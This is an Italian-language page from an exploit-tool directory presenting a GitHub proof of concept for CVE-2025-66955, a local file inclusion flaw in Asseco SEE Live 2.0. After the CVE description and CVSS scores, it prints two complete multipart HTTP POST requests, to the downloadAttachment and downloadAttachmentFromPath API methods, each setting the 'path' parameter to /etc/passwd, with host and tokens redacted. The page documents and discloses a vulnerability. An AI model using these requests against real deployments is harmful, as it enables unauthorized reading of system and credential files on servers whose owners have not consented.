Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-66955 — La Local File Inclusion nei componenti Contact Plan, E-Mail, SMS e Fax in Asseco SEE Live 2.0 consente agli utenti autenticati da remoto di accedere ai file sull'host tramite il parametro "path" nelle chiamate API downloadAttachment e downloadAttachmentFromPath. | Kitploit
Strumenti/GitHubGitHub/thewoodenbench/cve-2025-66955
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubthewoodenbench/cve-2025-66955

CVE-2025-66955

La Local File Inclusion nei componenti Contact Plan, E-Mail, SMS e Fax in Asseco SEE Live 2.0 consente agli utenti autenticati da remoto di accedere ai file sull'host tramite il parametro "path" nelle chiamate API downloadAttachment e downloadAttachmentFromPath.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
8 mesi faNon ancora revisionato

CVE-2025-66955

Inclusione di file locale nei componenti Contact Plan, E-Mail, SMS e Fax in Asseco SEE Live 2.0 consente agli utenti autenticati remoti di accedere ai file sull'host tramite il parametro "path" nelle chiamate API downloadAttachment e downloadAttachmentFromPath.

Vettori CVSS

  • CVSS 3.1: 7.7, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
  • CVSS 4.0: 8.4, CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N

Vettori di attacco

Le richieste HTTP richiedono un'autenticazione di basso livello.

downloadAttachment

root@kitploit:~
POST /live20/index.php HTTP/2
Host: [REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="requestType"

HTTP
------WebKitFormBoundary
Content-Disposition: form-data; name="method"

Email.downloadAttachment
------WebKitFormBoundary
Content-Disposition: form-data; name="id"

[REDACTED]
------WebKitFormBoundary
Content-Disposition: form-data; name="path"

/etc/passwd
------WebKitFormBoundary
Content-Disposition: form-data; name="downloadToken"

[REDACTED]
------WebKitFormBoundary--

downloadAttachmentFromPath

root@kitploit:~
POST /live20/index.php HTTP/2
Host: [REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="requestType"

HTTP
------WebKitFormBoundary
Content-Disposition: form-data; name="method"

Email.downloadAttachmentFromPath
------WebKitFormBoundary
Content-Disposition: form-data; name="path"

/etc/passwd
------WebKitFormBoundary
Content-Disposition: form-data; name="downloadToken"

[REDACTED]
------WebKitFormBoundary
Content-Disposition: form-data; name="model"

Template
------WebKitFormBoundary--

Scarica lo strumento